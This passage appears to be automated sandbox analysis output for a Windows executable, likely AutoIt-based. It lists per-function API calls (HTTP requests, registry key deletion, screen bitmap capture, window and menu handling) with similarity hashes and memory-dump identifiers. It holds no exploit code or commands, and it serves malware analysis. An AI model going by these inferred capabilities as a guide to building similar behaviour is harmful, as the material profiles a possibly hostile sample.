                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6712affb7889fc3a027230c681611ae59ce832c9fd7ce7ebccc127b9ff333ed1
                                                                                                                                                                                                                                                                                                    • Instruction ID: dd98ab88bc1b80810554f06084340d611cf9b42787163ecbed26be0e5f956b2d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6712affb7889fc3a027230c681611ae59ce832c9fd7ce7ebccc127b9ff333ed1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED711672A04206FEEF218F69DC89FAABFB4FF45364F104216F9156A1D0C7719958CB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,?), ref: 00AA7823
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AA7897
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AA78B9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AA78CC
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00AA78ED
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A10000,00000000), ref: 00AA791C
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AA7935
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00AA794E
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00AA7955
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AA796D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AA7985
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A12234: GetWindowLongW.USER32(?,000000EB), ref: 00A12242
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                                    • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5dc412b1331424cb8a8cc1387891e11d1c93523a6ebcfb3afe4241eada0f7bba
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2aae212a92e4fb57cc8303b43de185766ab618f6c67d55d722878f22a2e5464b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dc412b1331424cb8a8cc1387891e11d1c93523a6ebcfb3afe4241eada0f7bba
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C717771108245AFD725DF58CC48FBBBBE9FB8A304F44445EF986872A1CB74A946CB11
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
                                                                                                                                                                                                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00AA9BA3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA80AE: ClientToScreen.USER32(?,?), ref: 00AA80D4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA80AE: GetWindowRect.USER32(?,?), ref: 00AA814A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA80AE: PtInRect.USER32(?,?,?), ref: 00AA815A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00AA9C0C
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AA9C17
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AA9C3A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AA9C81
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00AA9C9A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00AA9CB1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00AA9CD3
                                                                                                                                                                                                                                                                                                    • DragFinish.SHELL32(?), ref: 00AA9CDA
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00AA9DCD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                                    • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                                                    • Opcode ID: 87135e251a1d04eeae226f5d123ef2cdfe8ecd7478ae8a5586185691dd855c84
                                                                                                                                                                                                                                                                                                    • Instruction ID: 143e53c1cc556cc4731f3dfd831d4c2a8f3b48d8f18102a4e01dece1efcf027d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87135e251a1d04eeae226f5d123ef2cdfe8ecd7478ae8a5586185691dd855c84
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6615A71108301AFC705EF60DD85D9BBBE9EF89750F40091DF592971A1DB709A4ACB62
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A8CEF5
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A8CF08
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A8CF1C
                                                                                                                                                                                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A8CF35
                                                                                                                                                                                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00A8CF78
                                                                                                                                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A8CF8E
                                                                                                                                                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A8CF99
                                                                                                                                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A8CFC9
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A8D021
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A8D035
                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00A8D040
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2a31109c05ba40898d84e5381940316272025ea197659a9741ab69e417be0132
                                                                                                                                                                                                                                                                                                    • Instruction ID: cb648475aed5bcd8fa9f546bd501b0aa834410bea37aeed195d977f741d42e8f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a31109c05ba40898d84e5381940316272025ea197659a9741ab69e417be0132
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13515DB1500705BFEB21EFA1C988AAB7BBCFF09754F00441AF98696690D734DD46EB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00AA66D6,?,?), ref: 00AA8FEE
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00AA66D6,?,?,00000000,?), ref: 00AA8FFE
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00AA66D6,?,?,00000000,?), ref: 00AA9009
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00AA66D6,?,?,00000000,?), ref: 00AA9016
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00AA9024
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AA66D6,?,?,00000000,?), ref: 00AA9033
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00AA903C
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00AA66D6,?,?,00000000,?), ref: 00AA9043
                                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AA66D6,?,?,00000000,?), ref: 00AA9054
                                                                                                                                                                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00AB0C04,?), ref: 00AA906D
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00AA907D
                                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00AA909D
                                                                                                                                                                                                                                                                                                    • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00AA90CD
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00AA90F5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00AA910B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9f412b901b62b966407f234fbe68cd1c8ff7e444005a70f314845c79cc1b0f74
                                                                                                                                                                                                                                                                                                    • Instruction ID: 16b53d87620ef6690b7a7c478cf42f1ca8eeacd7861c571d9a779e04d73e7e27
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f412b901b62b966407f234fbe68cd1c8ff7e444005a70f314845c79cc1b0f74
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8412975600209BFDB11DFA5DC88EABBBB8FF8A751F104059F946D72A0DB309942CB20
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A9C10E,?,?), ref: 00A9D415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A9C154
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A9C1D2
                                                                                                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 00A9C26A
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00A9C2DE
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00A9C2FC
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A9C352
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A9C364
                                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A9C382
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00A9C3E3
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00A9C3F4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 96a326548afaacf043bdb6bf0e6d2117fa666698e4e886258011ed664ff228f5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 922dbf78d043cc23b3daad654f36686c95db9f7f3407d1fc47b98154e6ba693f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96a326548afaacf043bdb6bf0e6d2117fa666698e4e886258011ed664ff228f5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6C19F30208601AFDB10DF54C485F6ABBE1FF85314F54859CF4AA8B6A2CB35ED86CB91
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00A93035
                                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00A93045
                                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00A93051
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00A9305E
                                                                                                                                                                                                                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00A930CA
                                                                                                                                                                                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00A93109
                                                                                                                                                                                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00A9312D
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00A93135
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00A9313E
                                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 00A93145
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00A93150
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1cf819f723e2e27d8c34b3372843926bbe374a9dc26cc6005136c8d22b86fb05
                                                                                                                                                                                                                                                                                                    • Instruction ID: 12cc1425acbeca983f073bf026104322b06638ef25847162471ca418a98e6128
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cf819f723e2e27d8c34b3372843926bbe374a9dc26cc6005136c8d22b86fb05
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4461C1B6E00219AFCF04CFA4D984AAEBBF5FF48310F208529E556A7250D771A941CF90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00AAA990
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00AAA9A7
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00AAA9B3
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00AAA9C9
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00AAAC15
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00AAAC33
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00AAAC54
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00AAAC73
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00AAAC95
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000005,?), ref: 00AAACBB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                                    • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                                                    • Opcode ID: 806f5b62934cadaf959887ec3957951c1fc8c2283c284671c24e3accf1801da3
                                                                                                                                                                                                                                                                                                    • Instruction ID: cd16e6ab1ac2e65e80a31e747bec99437e37807a04d3679de94ae35fbfd01f13
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 806f5b62934cadaf959887ec3957951c1fc8c2283c284671c24e3accf1801da3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67B1883160021AEFDF14CFA8C9847AE7BF2FF55710F188069EC49AB295D775A980CB61
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00A752E6
                                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00A75328
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A75339
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00A75345
                                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00A7537A
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00A753B2
                                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00A753EB
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00A75445
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00A75477
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00A754EF
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                    • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                                    • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AA97B6
                                                                                                                                                                                                                                                                                                    • GetFocus.USER32 ref: 00AA97C6
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00AA97D1
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00AA9879
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00AA992B
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00AA9948
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00AA9958
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00AA998A
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00AA99CC
                                                                                                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AA99FD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00AE29C0,000000FF,00000000,00000030), ref: 00A7C973
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(00AE29C0,00000004,00000000,00000030), ref: 00A7C9A8
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00A7C9BA
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00A7CA00
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00A7CA1D
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00A7CA49
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00A7CA90
                                                                                                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A7CAD6
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A7CAEB
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A7CB0C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                                    • String ID: 0
